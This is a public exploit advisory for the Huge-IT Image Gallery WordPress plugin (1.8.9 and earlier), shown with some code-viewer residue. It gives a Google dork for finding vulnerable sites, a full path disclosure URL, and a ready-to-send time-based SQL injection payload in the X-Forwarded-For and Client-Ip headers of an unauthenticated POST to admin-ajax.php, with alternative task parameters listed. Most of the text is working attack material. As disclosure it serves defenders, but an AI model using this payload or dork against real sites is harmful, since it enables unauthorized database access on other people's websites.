61 lines
No EOL
1.7 KiB
Text
61 lines
No EOL
1.7 KiB
Text
# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection
|
|
# Google Dork: inurl:"wp-content/plugins/gallery-images/"
|
|
# Date: 12-05-2016
|
|
# Software Link: https://fr.wordpress.org/plugins/gallery-images/
|
|
# Version: 1.8.9 and prior
|
|
# Exploit Author: Gwendal Le Coguic
|
|
# Website: http://10degres.net
|
|
# Category: webapps
|
|
|
|
|
|
##### About #####
|
|
|
|
Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.
|
|
|
|
|
|
##### Full Path Disclosure #####
|
|
|
|
http://[target]/wp-content/plugins/gallery-images/gallery-images.php
|
|
|
|
|
|
##### SQL Injection #####
|
|
|
|
Headers X-Forwarded-For and Client-Ip are vulnerable.
|
|
Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization
|
|
Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL
|
|
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: [target]
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Client-Ip: 123.123.123.123
|
|
X-Forwarded-For: 123.123.123.123
|
|
Connection: keep-alive
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 89
|
|
|
|
action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100
|
|
|
|
|
|
### Extras infos #####
|
|
|
|
The "galleryid" must be configured or try another id.
|
|
|
|
You don't need to be authed to exploit the injection but the plugin must be enable.
|
|
|
|
"task" parameter can be:
|
|
load_images_content
|
|
load_images_lightbox
|
|
load_image_justified
|
|
load_image_thumbnail
|
|
load_blog_view
|
|
|
|
Client-Ip overwrite X-Forwarded-For.
|
|
Some system drop those headers.
|
|
|
|
|
|
##### References #####
|
|
|
|
https://www.owasp.org/index.php/Full_Path_Disclosure
|
|
https://www.owasp.org/index.php/SQL_Injection |